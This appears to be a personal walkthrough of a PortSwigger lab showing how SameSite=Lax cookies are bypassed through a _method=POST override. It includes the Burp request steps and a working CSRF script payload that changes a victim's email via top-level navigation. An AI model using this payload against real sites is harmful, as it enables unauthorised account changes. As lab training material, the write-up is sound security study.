[This lab](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-lax-bypass-via-method-override) showcases how **SameSite=Lax** cookie protection can be bypassed if the app allows a **GET request with `_method=POST`**, enabling CSRF via **top-level navigation**. Since Chrome allows cookies on top-level **GET requests** under SameSite=Lax, we can abuse that with a crafted CSRF payload. ##### Step 1: Understand the Session Behavior 1. Log in as `wiener:peter` 2. Submit an email change (e.g., `[email protected]`) 3. In **Burp → Proxy → HTTP history**, inspect: ```http POST /my-account/change-email [email protected] ``` ➡ No CSRF token, just a session cookie ![[CleanShot 2025-04-23 at 19.57.00.png]] --- ##### Step 2: Analyze SameSite Behavior 1. Look at the **Set-Cookie** response from `/login` ```http Set-Cookie: session=abc123 ``` ❌ No `SameSite=None` → browser uses default: `SameSite=Lax` ✅ This means: - **POST requests from other origins**: ❌ no cookie sent - **GET requests via top-level navigation**: ✅ cookie **is** sent --- ##### Step 3: Test Method Override 1. Send the POST request to **Burp Repeater** 2. Right-click → **Change request method → GET** ```http GET /my-account/[email protected]&_method=POST ``` ✅ Response: email changed 🎯 This endpoint accepts `_method=POST` via query string → **bypass enabled** ![[CleanShot 2025-04-23 at 19.58.44.png]] --- #### Step 4: Build the Exploit Use a **top-level navigation** to make the request with `_method=POST` in the query: ```html <script> location = "https://YOUR-LAB-ID.web-security-academy.net/my-account/[email protected]&_method=POST"; </script> ``` > ✅ This triggers a GET request, including the session cookie > ✅ Server treats it as a POST due to `_method=POST` --- #### Step 5: Launch the Attack 1. Go to the **Exploit Server** 2. Paste the above payload into the **Body** 3. Click **Store** 4. Click **View exploit** to test it on yourself - Email should be changed ✅ 5. Change the email to something unique like: ```html [email protected] ``` 6. Click **Deliver to victim** ✅ Lab is **solved** when the victim’s email is changed --- ### 🔍 Summary |Behavior|Exploit| |---|---| |Cookies use SameSite=Lax|✅ Allows GET w/ top-level navigation| |Server requires POST|✅ Accepts `_method=POST` override| |Final vector|GET + `_method=POST` + auto-navigation| |Bypass method|`<script>document.location = "..."</script>`|